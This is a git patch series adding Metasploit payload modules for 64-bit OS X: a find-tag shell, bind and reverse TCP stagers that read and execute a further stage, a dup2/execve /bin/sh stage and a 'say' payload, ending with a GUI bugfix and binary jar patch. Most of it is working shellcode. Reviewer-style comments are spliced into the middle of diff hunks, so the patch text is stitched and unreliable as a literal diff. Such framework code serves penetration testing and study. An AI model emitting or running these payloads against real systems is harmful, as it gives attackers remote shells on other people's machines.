From dccb8d235dd68759ba972933e8030c289fdf908e Mon Sep 17 00:00:00 2001
From: dcbz
Date: Fri, 21 Sep 2012 15:39:35 -0500
Subject: [PATCH 01/17] Adding OSX 64-bit find-tag module.
---
 .../singles/osx/x64/shell_find_tag.rb | 87 +++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 modules/payloads/singles/osx/x64/shell_find_tag.rb
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
new file mode 100644
index 0000000000..28fef6216b
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -0,0 +1,87 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/find_tag'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Payload::Osx
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'OSX Command Shell, Find Tag Inline',
+ 'Version' => '$Revision$',
+ 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)',
+ 'Author' => 'nemo ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'Handler' => Msf::Handler::FindTag,
+ 'Session' => Msf::Sessions::CommandShellUnix
+
+ ))
+ # exec payload options
+ register_options(
+ [
+ OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]),
+ OptString.new('TAG', [ true, "The tag to test for", "NEMO" ]),
+ ], self.class)
+ end
+
+ #
+ # ensures the setting of tag to a four byte value
+ #
+ def generate
+ cmd = (datastore['CMD'] || '') << "\x00"
+ call = "\xe8" + [cmd.length].pack('V')
+ payload =
+ "\x48\x31\xFF" + # xor rdi,rdi
+ "\x57" + # push rdi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x6A\x04" + # push byte +0x4
+ "\x5A" + # pop rdx
+ "\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
+ "\x4D\x31\xC0" + # xor r8,r8
+ "\x4D\x31\xC9" + # xor r9,r9
+ "\x48\xFF\xCF" + # dec rdi
+ "\x48\xFF\xC7" + # inc rdi
+ "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
+ "\x0F\x05" + # loadall286
+ "\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
+ datastore['TAG'] +
+ "\x75\xED" + # jnz 0x17
+ "\x48\x31\xC9" + # xor rcx,rcx
+ "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
+ "\x0F\x05" + # loadall286
+ "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
+ "\x48\x31\xF6" 
+ # xor rsi,rsi
+ "\x0F\x05" + # loadall286
+ "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
+ "\x48\xFF\xC6" + # inc rsi
+ "\x0F\x05" + # loadall286
+ "\x48\x31\xC0" + # xor rax,rax
+ "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
+ call +
+ cmd +
+ "\x48\x8B\x3C\x24" + # mov rdi,[rsp]
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x52" + # push rdx
+ "\x57" + # push rdi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x0F\x05" # loadall286
+ end
+
+end
From 81ceff73703db31faf7c04dc5d7184052aac8fb2 Mon Sep 17 00:00:00 2001
From: dcbz
Date: Sat, 22 Sep 2012 07:24:51 -0500
Subject: [PATCH 02/17] Added a tcp stager, and a small exec for testing
---
 modules/payloads/stagers/osx/x64/bind_tcp.rb | 113 ++++++++++++++++++
 .../payloads/stages/osx/x64/dupandexecve.rb | 42 +++++++
 2 files changed, 155 insertions(+)
 create mode 100644 modules/payloads/stagers/osx/x64/bind_tcp.rb
 create mode 100644 modules/payloads/stages/osx/x64/dupandexecve.rb
diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb
new file mode 100644
index 0000000000..4202c42ed7
--- /dev/null
+++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb
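Review bot: In generate, `cmd = (datastore['CMD'] || '') << "\x00"` appends to the datastore's own String object, so each call to generate leaves one more NUL in CMD and the emitted call displacement grows with it; `cmd = (datastore['CMD'] || '') + "\x00"` builds a fresh string instead. That displacement is also taken from `cmd.length`, which counts characters rather than bytes once the option string carries a multibyte encoding, so `[cmd.bytesize].pack('V')` is the value the `call` needs; say.rb later in this series repeats both problems. The comment above generate says it "ensures the setting of tag to a four byte value", but nothing checks `datastore['TAG']` before it is spliced into the `cmp dword [rsp],imm32` encoding, so either reject a TAG whose bytesize is not 4 with an ArgumentError or reword the comment to describe what the method actually does. Every `# loadall286` comment labels the `\x0F\x05` bytes with a 16-bit disassembler's mnemonic; in 64-bit mode that opcode is `syscall`, and bind_tcp.rb and say.rb carry the same mislabel.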
@@ -0,0 +1,113 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+###
+#
+# BindTcp
+# -------
+#
+# Mac OS X x86 bind TCP stager.
+#
+###
+module Metasploit3
+
+ include Msf::Payload::Stager
+
+ def initialize(info = { })
+ super(merge_info(info,
+ 'Name' => 'Bind TCP Stager',
+ 'Version' => '$Revision$',
+ 'Description' => 'Listen, read length, read buffer, execute',
+ 'Author' => 'nemo',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Convention' => 'sockedi',
+ 'Stager' =>
+ {
+ 'Offsets' => { 'LPORT' => [ 31, 'n'] },
+ 'Payload' =>
+ "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
+ "\x6A\x02" + # push byte +0x2
+ "\x5F" + # pop rdi
+ "\x6A\x01" + # push byte +0x1
+ "\x5E" + # pop rsi
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x0F\x05" + # loadall286
+ "\x48\x89\xC7" + # mov rdi,rax
+ "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x56" + # push rsi
+ "\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
+ "\x56" + # push rsi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x6A\x10" + # push byte +0x10
+ "\x5A" + # pop rdx
+ "\x0F\x05" + # loadall286
+ "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x48\xFF\xC6" + # inc rsi
+ "\x49\x89\xFC" + # mov r12,rdi
+ "\x0F\x05" + # loadall286
+ "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
+ "\x4C\x89\xE7" + # mov rdi,r12
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x48\x89\xE2" + # mov rdx,rsp
+ "\x48\x83\xEA\x04" + # sub rdx,byte +0x4
+ "\x0F\x05" + # loadall286
+ "\x49\x89\xC5" + # mov r13,rax
+ "\x48\x89\xC7" + # mov rdi,rax
+ "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
+ "\x48\x31\xC9" + # xor rcx,rcx
+ "\x51" + # push rcx
+ "\x48\x89\xE6" + # mov 
rsi,rsp
+ "\xBA\x04\x00\x00\x00" + # mov edx,0x4
+ "\x4D\x31\xC0" + # xor r8,r8
+ "\x4D\x31\xD2" + # xor r10,r10
+ "\x0F\x05" + # loadall286
+ "\x41\x5B" + # pop r11
+ "\x4C\x89\xDE" + # mov rsi,r11
+ "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
+ "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
+ "\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
+ "\x48\x31\xFF" + # xor rdi,rdi
+ "\x48\xFF\xCF" + # dec rdi
+ "\xBA\x07\x00\x00\x00" + # mov edx,0x7
+ "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
+ "\x49\x89\xF8" + # mov r8,rdi
+ "\x4D\x31\xC9" + # xor r9,r9
+ "\x0F\x05" + # loadall286
+ "\x48\x89\xC6" + # mov rsi,rax
+ "\x56" + # push rsi
+ "\x4C\x89\xEF" + # mov rdi,r13
+ "\x48\x31\xC9" + # xor rcx,rcx
+ "\x4C\x89\xDA" + # mov rdx,r11
+ "\x4D\x31\xC0" + # xor r8,r8
+ "\x4D\x31\xD2" + # xor r10,r10
+ "\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
+ "\x0F\x05" + # loadall286
+ "\x58" + # pop rax
+ "\xFF\xD0" # call rax
+ }
+ ))
+ end
+
+ def handle_intermediate_stage(conn, p)
+ #
+ # Our stager payload expects to see a next-stage length first.
+ #
+ conn.put([p.length].pack('V'))
+ end
+end
diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb
new file mode 100644
index 0000000000..afe727791d
--- /dev/null
+++ b/modules/payloads/stages/osx/x64/dupandexecve.rb
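Review bot: The module header calls this a `# Mac OS X x86 bind TCP stager.` while 'Arch' is ARCH_X86_64 and the payload is 64-bit code, so the header should say x86_64; reverse_tcp.rb in the next commit has the same x86/x64 mismatch in its header. `'Offsets' => { 'LPORT' => [ 31, 'n'] }` carries no explanation of what the number refers to; the port bytes `\x15\xB3` are the last two bytes of the `mov esi,0xb3150200` immediate that is pushed as the sockaddr_in, so a comment like `# 31: port field inside the 'mov esi' sockaddr_in immediate` next to it would let the offset be re-checked without counting bytes. The `$Id$` and `$Revision$` placeholders are Subversion keywords that git does not expand, so they will remain literal in every file of this series.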
@@ -0,0 +1,42 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'OS X dup2 Command Shell',
+ 'Version' => '$Revision$',
+ 'Description' => 'dup2 socket in edi, then execve',
+ 'Author' => 'nemo',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'Stage' =>
+ {
+ 'Payload' =>
+ "\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
+ "\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
+ "\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
+ "\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
+ "\x52\x57\x48\x89\xe6\x0f\x05"
+ }
+ ))
+ end
+
+end
From 09b8a6d87fbdc60f95e370f234ecaa78d5293ef8 Mon Sep 17 00:00:00 2001
From: dcbz
Date: Sat, 22 Sep 2012 08:31:42 -0500
Subject: [PATCH 03/17] Added reverse_tcp stager payload, and updated bind
---
 modules/payloads/stagers/osx/x64/bind_tcp.rb | 2 +-
 .../payloads/stagers/osx/x64/reverse_tcp.rb | 69 +++++++++++++++++++
 2 files changed, 70 insertions(+), 1 deletion(-)
 create mode 100644 modules/payloads/stagers/osx/x64/reverse_tcp.rb
diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb
index 4202c42ed7..4390b1b41c 100644
--- a/modules/payloads/stagers/osx/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb
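Review bot: The 'Payload' byte string has no per-instruction comments, whereas bind_tcp.rb in the same commit annotates every instruction; for consistency either split it the same way or put one line above it stating what it does, e.g. `# dup2(sock, 0); dup2(sock, 1); execve("/bin/sh", ["/bin/sh"], NULL)`, which is what the bytes decode to. The Description `'dup2 socket in edi, then execve'` names a 32-bit register; this is 64-bit code and the stagers in this series leave the socket in rdi before `call rax`, so `'dup2 socket in rdi, then execve'` is the accurate wording ('sockedi' stays as the framework's convention name).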
@@ -29,7 +29,7 @@ module Metasploit3
 'Name' => 'Bind TCP Stager',
 'Version' => '$Revision$',
 'Description' => 'Listen, read length, read buffer, execute',
- 'Author' => 'nemo',
+ 'Author' => 'nemo ',
 'License' => MSF_LICENSE,
 'Platform' => 'osx',
 'Arch' => ARCH_X86_64,
diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
new file mode 100644
index 0000000000..02585e916e
--- /dev/null
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -0,0 +1,69 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+###
+#
+# ReverseTcp
+# -------
+#
+# Mac OS X x86 Reverse TCP stager.
+#
+###
+module Metasploit3
+
+ include Msf::Payload::Stager
+
+ def initialize(info = { })
+ super(merge_info(info,
+ 'Name' => 'Reverse TCP Stager',
+ 'Version' => '$Revision$',
+ 'Description' => 'Connect, read length, read buffer, execute',
+ 'Author' => 'nemo ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Convention' => 'sockedi',
+ 'Stager' =>
+ {
+ 'Offsets' =>
+ {
+ 'LHOST' => [ 37, 'ADDR'],
+ 'LPORT' => [ 35, 'n']
+ },
+ 'Payload' =>
+ "\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
+ "\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
+ "\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
+ "\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
+ "\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
+ "\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
+ "\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
+ "\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
+ "\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
+ "\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
+ "\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
+ "\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
+ "\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
+ }
+ ))
+ end
+
+ def handle_intermediate_stage(conn, p)
+ #
+ # Our stager payload expects to see a next-stage length first.
+ #
+ conn.put([p.length].pack('V'))
+ end
+end
From 202a78dd3f58856c959682170774641a935547b7 Mon Sep 17 00:00:00 2001
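Review bot: `'LHOST' => [ 37, 'ADDR']` and `'LPORT' => [ 35, 'n']` are bare byte offsets with nothing in the file tying them to the instruction they patch; both fall inside the 10-byte `mov rsi, imm64` (`\x48\xbe\x00\x02\x15\xb3\x7f\x00\x00\x01`) that begins at offset 31 and is pushed as the sockaddr_in, so a comment such as `# offsets index into the sockaddr_in immediate of the mov rsi,imm64 at byte 31: port at 35, address at 37` would make them checkable. Unlike bind_tcp.rb, the payload is an unannotated hex blob, so a reader has to disassemble it to verify those offsets at all; the per-instruction comment style used there, or at least one comment naming the sequence of syscalls it issues, is the more maintainable form. The header comment's `Mac OS X x86` wording is covered in the bind_tcp.rb note.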
From: dcbz
Date: Sat, 22 Sep 2012 09:13:29 -0500
Subject: [PATCH 04/17] Added say.rb: uses /usr/bin/say to output a string
---
 modules/payloads/singles/osx/x64/say.rb | 56 +++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 modules/payloads/singles/osx/x64/say.rb
diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
new file mode 100644
index 0000000000..476097996b
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/say.rb
@@ -0,0 +1,56 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'OSX X64 say Shellcode',
+ 'Version' => '$Revision$',
+ 'Description' => 'Say an arbitrary string outloud using Mac OS X text2speech',
+ 'Author' => 'nemo ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64
+ ))
+
+ # exec payload options
+ register_options(
+ [
+ OptString.new('SAY', [ true, "The string to say", "owned by nemo"]),
+ ], self.class)
+ end
+
+ # build the shellcode payload dynamically based on the user-provided CMD
+ def generate
+ say = (datastore['SAY'] || '') << "\x00"
+ call = "\xe8" + [say.length + 0xd].pack('V')
+ payload =
+ "\x48\x31\xC0" + # xor rax,rax
+ "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
+ call +
+ "/usr/bin/say\x00" +
+ say +
+ "\x48\x8B\x3C\x24" + # mov rdi,[rsp]
+ "\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x52" + # push rdx
+ "\x41\x52" + # push r10
+ "\x57" + # push rdi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x0F\x05" # loadall286
+ end
+end
From 10e1574d8a4ea7ad211cd9590a0ed0288488077d Mon Sep 17 00:00:00 2001
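Review bot: The comment above generate says the shellcode is built 'based on the user-provided CMD', but this module registers only SAY and reads `datastore['SAY']`; `# build the shellcode payload dynamically from the user-provided SAY string` matches the code. The `0xd` in `[say.length + 0xd].pack('V')` is the byte length of `"/usr/bin/say\x00"` and has to agree with the `lea r10,[rdi+0xd]` displacement a few lines down, so that coupling deserves a comment on the call line, e.g. `# 0xd == "/usr/bin/say\x00".bytesize; keep in step with lea r10,[rdi+0xd]`. `say = (datastore['SAY'] || '') << "\x00"` and `say.length` carry the in-place mutation and character-vs-byte length problems raised on shell_find_tag.rb, and a text-to-speech string is exactly where non-ASCII input should be expected, so `bytesize` matters most here.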
From: scriptjunkie
Date: Sat, 22 Sep 2012 16:16:54 -0500
Subject: [PATCH 05/17] Bugfix with dragging tabbed panes when right-clicked. Also don't displaly annoying null pointer error when no connection.
---
 data/gui/msfgui.jar | Bin 797495 -> 799736 bytes
 .../src/msfgui/DraggableTabbedPane.java | 14 ++++++++++++--
 .../msfguijava/src/msfgui/RpcConnection.java | 3 ++-
 3 files changed, 14 insertions(+), 3 deletions(-)
diff --git a/data/gui/msfgui.jar b/data/gui/msfgui.jar index 34e09347dc4590919fa35a6c6b4aa94ed59401a5..f86f69c44821b33cdbc2ab5daaba34f8f344287a 100755 GIT binary patch delta 18034 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 